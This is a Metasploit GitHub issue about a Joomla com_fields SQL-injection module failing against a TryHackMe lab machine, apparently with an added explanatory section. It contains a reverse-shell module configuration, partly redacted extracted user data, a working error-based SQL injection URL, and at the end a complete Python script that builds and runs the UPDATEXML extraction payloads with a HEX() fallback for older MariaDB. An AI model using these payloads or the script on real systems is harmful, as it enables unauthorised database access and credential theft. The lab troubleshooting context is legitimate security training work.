rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

unix/webapp/joomla_comfields_sqli_rce - Error retrieving table prefix #14149

Open cgranleese-r7 opened 4 years ago

cgranleese-r7 commented 4 years ago

Steps to reproduce

How'd you do it?

  1. start msfconsole
  2. search joomla type:exploit
  3. use 2
  4. set options
  5. run

Yeah, it failed and returned: Error retrieving table prefix

Were you following a specific guide/tutorial or reading documentation?

https://tryhackme.com/room/dailybugle

Expected behavior

What should happen? Return a reverse shell

kali@kali:~$ python ./joomblah.py http://10.10.180.131

    .---.    .-'''-.        .-'''-.                                                           
    |   |   '   _    \     '   _    \                            .---.                        
    '---' /   /` '.   \  /   /` '.   \  __  __   ___   /|        |   |            .           
    .---..   |     \  ' .   |     \  ' |  |/  `.'   `. ||        |   |          .'|           
    |   ||   '      |  '|   '      |  '|   .-.  .-.   '||        |   |         <  |           
    |   |\    \     / / \    \     / / |  |  |  |  |  |||  __    |   |    __    | |           
    |   | `.   ` ..' /   `.   ` ..' /  |  |  |  |  |  |||/'__ '. |   | .:--.'.  | | .'''-.    
    |   |    '-...-'`       '-...-'`   |  |  |  |  |  ||:/`  '. '|   |/ |   \ | | |/.'''. \   
    |   |                              |  |  |  |  |  |||     | ||   |`" __ | | |  /    | |   
    |   |                              |__|  |__|  |__|||\    / '|   | .'.''| | | |     | |   
 __.'   '                                              |/'..' / '---'/ /   | |_| |     | |   
|      '                                               '  `'-'`       \ \._,\ '/| '.    | '.  
|____.'                                                                `--'  `" '---'   '---' 

 [-] Fetching CSRF token
 [-] Testing SQLi
  -  Found table: fb9j5_users
  -  Extracting users from fb9j5_users
 [$] Found user ['811', 'Super User', 'jo.., 'jonah@....com', '$2y$10$0veO/JSFh4..', '', '']
  -  Extracting sessions from fb9j5_session

Current behavior

What happens instead? It returns Error retrieving table prefix

Metasploit version

Framework: 5.0.101-dev

Additional Information

If your version is less than 5.0.96, please update to the latest version and ensure your issue is still present.

If the issue is encountered within msfconsole, please run the debug command using the instructions below. If the issue is encountered outside msfconsole, or the issue causes msfconsole to crash on startup, please delete this section.

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

```
[framework/ui/console]
ActiveModule=exploit/unix/webapp/joomla_comfields_sqli_rce

[unix/webapp/joomla_comfields_sqli_rce]
WORKSPACE=
VERBOSE=false
WfsDelay=0
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
RHOSTS=10.10.180.131
RPORT=80
VHOST=
SSL=false
Proxies=
UserAgent=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HttpUsername=
HttpPassword=
HttpRawHeaders=
DigestAuthIIS=true
SSLVersion=Auto
FingerprintCheck=true
DOMAIN=WORKSTATION
HttpClientTimeout=
HttpPartialResponses=false
HttpTrace=true
HttpTraceHeadersOnly=false
HttpTraceColors=red/blu
HTTP::uri_encode_mode=hex-normal
HTTP::uri_full_url=false
HTTP::pad_method_uri_count=1
HTTP::pad_uri_version_count=1
HTTP::pad_method_uri_type=space
HTTP::pad_uri_version_type=space
HTTP::method_random_valid=false
HTTP::method_random_invalid=false
HTTP::method_random_case=false
HTTP::version_random_valid=false
HTTP::version_random_invalid=false
HTTP::uri_dir_self_reference=false
HTTP::uri_dir_fake_relative=false
HTTP::uri_use_backslashes=false
HTTP::pad_fake_headers=false
HTTP::pad_fake_headers_count=0
HTTP::pad_get_params=false
HTTP::pad_get_params_count=16
HTTP::pad_post_params=false
HTTP::pad_post_params_count=16
HTTP::uri_fake_end=false
HTTP::uri_fake_params_start=false
HTTP::header_folding=false
FileDropperDelay=
TARGETURI=/
PAYLOAD=php/meterpreter/reverse_tcp
LHOST=10.11.16.15
LPORT=4444
ReverseListenerBindPort=
ReverseAllowProxy=false
ReverseListenerComm=
ReverseListenerBindAddress=
ReverseListenerThreaded=false
StagerRetryCount=10
StagerRetryWait=5
PingbackRetries=0
PingbackSleep=30
PayloadUUIDSeed=
PayloadUUIDRaw=
PayloadUUIDName=
PayloadUUIDTracking=false
EnableStageEncoding=false
StageEncoder=
StageEncoderSaveRegisters=
StageEncodingFallback=true
AutoLoadStdapi=true
AutoVerifySession=true
AutoVerifySessionTimeout=30
InitialAutoRunScript=
AutoRunScript=
AutoSystemInfo=true
EnableUnicodeEncoding=false
HandlerSSLCert=
SessionRetryTotal=3600
SessionRetryWait=10
SessionExpirationTimeout=604800
SessionCommunicationTimeout=300
PayloadProcessCommandLine=
AutoUnhookProcess=false
```

History

The following commands were run during the session and before this issue occurred:

```
221 search joomla
222 use 9
223 options
224 set RHOSTS 10.10.180.131
225 options
226 run
227 set httptrace true
228 run
229 search joomla
230 search joomla type:exploit
231 use 2
232 options
233 set RHOSTS 10.10.180.131
234 ip a
235 set LHOST 10.11.16.15
236 options
237 run
238 search joomla
239 search joomla type:exploit
240 use 5
241 options
242 set RHOSTS 10.10.180.131
243 set USERNAME jonah
244 set LHOST 10.11.16.15
245 options
246 set TARGETuRI /
247 set PASSWORD *****
248 run
249 set HTTPTRACE true
250 options
251 run
252 info -d
253 search joomla type:exploit
254 use 2
255 options
256 run
257 set HTTPTRACE true
258 run
259 edit
260 run
261 --version
262 version
263 debug
```

Errors

The following errors occurred before the issue occurred:

```
[09/17/2020 05:47:14] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/17/2020 05:47:14] [e(0)] core: Unable to load module /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go - Errno::ENOENT No such file or directory - go
[09/17/2020 05:47:14] [e(0)] core: Unable to load module /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go - Errno::ENOENT No such file or directory - go
[09/17/2020 05:47:14] [e(0)] core: Unable to load module /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go - Errno::ENOENT No such file or directory - go
[09/17/2020 05:47:14] [e(0)] core: Unexpected output running /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py:
Traceback (most recent call last):
  File "/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", line 178, in
    ntfea9000 = (pack('
```

Logs

The following logs were recorded before the issue occurred:

```
Traceback (most recent call last):
  File "/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", line 178, in
    ntfea9000 = (pack('
```

Version/Install

The versions and install method of your Metasploit setup:

```
Framework: 5.0.101-dev
Ruby: ruby 2.7.0p0 (2019-12-25 revision 647ee6f091) [x86_64-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: postgresql selected, no connection
Install Method: Other - Please specify
```

cgranleese-r7 commented 3 years ago

Hey future @cgranleese-r7 , we need an issue template filled out properly!

label-actions[bot] commented 3 years ago

When creating an issue, please ensure that the default issue template has been updated with the required details.

Closing this issue. If you believe this issue has been closed in error, please provide any relevant output and logs which may be useful in diagnosing the issue.

paulbauriegel commented 2 years ago

The problem could be that the database on TryHackMe does not know TO_BASE64. See http://10.10.147.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(2170,CONCAT(0x2e,0x6942465a70,(SELECT%20MID((IFNULL(CAST(TO_BASE64(table_name)%20AS%20CHAR),0x20)),1,22)%20FROM%20information_schema.tables%20order%20by%20update_time%20DESC%20LIMIT%201),0x5359595a48),4879))

TO_BASE64 was introduced with MySQL 5.6; on the box you have 5.5.64-MariaDB.

Results in:

```
500 FUNCTION joomla.TO_BASE64 does not exist
```

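The payload quoted in the comment above is a classic error-based extraction: the value is wrapped in `TO_BASE64()`, sliced with `MID()`, placed between two marker strings inside `UPDATEXML()`, and read back out of the server's "XPATH syntax error" message, which quotes only the first 32 characters of the bad expression. On a server without `TO_BASE64()` the whole chain dies before any error leaks, which is exactly the 500 shown above. The script below is an added example, not code from the Metasploit module or from joomblah.py: it builds the same `list[fullordering]` value with the encoder swapped in, parses the leaked chunks, and falls back from `TO_BASE64()` to `HEX()` when the server reports the function missing. The transport is a callable so it runs offline against a constructed stand-in for the thread's MariaDB 5.5 box; `FakeJoomlaTarget`, `XPATH_ERR_LIMIT` and the chunk size are assumptions of this example, and the marker strings are the ones decoded from the quoted URL.

```python
"""Error-based SQLi extraction through UPDATEXML(), with HEX() as the fallback
for servers lacking TO_BASE64() (MySQL < 5.6, MariaDB < 10.0.5).
Added example for this thread; not code from the Metasploit module or joomblah.py.
"""
import base64
import re
from urllib.parse import quote

# Delimiters from the payload quoted in the thread: 0x6942465a70 = "iBFZp", 0x5359595a48 = "SYYZH".
MARK_L, MARK_R = "iBFZp", "SYYZH"
# MySQL/MariaDB quote at most 32 characters of the offending XPath expression,
# so the value has to be pulled out in pieces (assumed limit, standard for this technique).
XPATH_ERR_LIMIT = 32
CHUNK = XPATH_ERR_LIMIT - 1 - len(MARK_L) - len(MARK_R)  # leading "." + both markers -> 21 chars

ENCODERS = {
    "base64": "TO_BASE64({})",  # MySQL >= 5.6 / MariaDB >= 10.0.5 only
    "hex": "HEX({})",           # present on every MySQL/MariaDB release
}

def hexlit(s: str) -> str:
    """Render a string as a 0x.. literal so the payload needs no quote characters."""
    return "0x" + s.encode().hex()

def build_ordering(column: str, source: str, offset: int, encoder: str) -> str:
    """Value for list[fullordering], in the shape of the thread's URL, with a swappable encoder."""
    wrapped = ENCODERS[encoder].format(column)
    select = (f"SELECT MID((IFNULL(CAST({wrapped} AS CHAR),0x20)),{offset},{CHUNK}) "
              f"FROM {source} LIMIT 1")
    return f"(UPDATEXML(2170,CONCAT(0x2e,{hexlit(MARK_L)},({select}),{hexlit(MARK_R)}),4879))"

def build_url(base: str, ordering: str) -> str:
    return (f"{base}/index.php?option=com_fields&view=fields&layout=modal"
            f"&list[fullordering]={quote(ordering, safe='(),')}")

LEAK_RE = re.compile(r"XPATH syntax error: '\.(.*?)'")

def parse_leak(body: str):
    """Return the text between the markers in a leaked XPath error, or None if there is none."""
    m = LEAK_RE.search(body)
    if not m or not m.group(1).startswith(MARK_L):
        return None
    return m.group(1)[len(MARK_L):].split(MARK_R, 1)[0]

def decode(value: str, encoder: str) -> str:
    if encoder == "hex":
        return bytes.fromhex(value).decode("utf-8", "replace")
    return base64.b64decode(value + "=" * (-len(value) % 4)).decode("utf-8", "replace")

def extract(send, column: str, source: str, encoders=("base64", "hex")):
    """Pull one value out chunk by chunk; send(ordering) -> (status, body).
    Moves on to the next encoder when the server reports the function missing."""
    for encoder in encoders:
        chunks, offset = [], 1
        while True:
            status, body = send(build_ordering(column, source, offset, encoder))
            if "does not exist" in body:      # e.g. "FUNCTION joomla.TO_BASE64 does not exist"
                chunks = None
                break
            piece = parse_leak(body)
            if piece is None:
                raise RuntimeError(f"no XPath error in response (HTTP {status}): {body[:80]!r}")
            chunks.append(piece)
            if len(piece) < CHUNK:            # a short piece means the value is exhausted
                break
            offset += CHUNK
        if chunks is not None:
            return encoder, decode("".join(chunks), encoder)
    raise RuntimeError("none of the encoders is available on the target")

class FakeJoomlaTarget:
    """Constructed stand-in for the thread's box: one table name, Joomla passing the raw
    database error through, and TO_BASE64 optionally missing (MariaDB 5.5 behaviour)."""
    MID_RE = re.compile(r"MID\(\(IFNULL\(CAST\((TO_BASE64|HEX)\(table_name\) AS CHAR\),0x20\)\),(\d+),(\d+)\)")

    def __init__(self, table_name="fb9j5_users", has_to_base64=False):
        self.table_name, self.has_to_base64 = table_name, has_to_base64

    def send(self, ordering: str):
        m = self.MID_RE.search(ordering)
        if not m:
            return 200, "<html>field list</html>"
        func, pos, n = m.group(1), int(m.group(2)), int(m.group(3))
        if func == "TO_BASE64" and not self.has_to_base64:
            return 500, "FUNCTION joomla.TO_BASE64 does not exist"
        raw = self.table_name.encode()
        value = raw.hex().upper() if func == "HEX" else base64.b64encode(raw).decode()
        piece = value[pos - 1:pos - 1 + n]                      # MID() is 1-indexed
        xpath = "." + MARK_L + piece + MARK_R
        return 500, f"XPATH syntax error: '{xpath[:XPATH_ERR_LIMIT]}'"

if __name__ == "__main__":
    box = FakeJoomlaTarget()                                    # MariaDB 5.5: TO_BASE64 missing
    print(build_url("http://10.10.180.131", build_ordering("table_name", "information_schema.tables", 1, "hex")))
    print(extract(box.send, "table_name", "information_schema.tables ORDER BY update_time DESC"))
```

The fallback is the practical takeaway: probe once with the preferred encoder, and on a "FUNCTION ... does not exist" response switch to `HEX()`, which every MySQL and MariaDB release supports. Because hex doubles the length, the number of requests per value roughly doubles, so the chunk size is derived from the 32-character error limit rather than hard-coded.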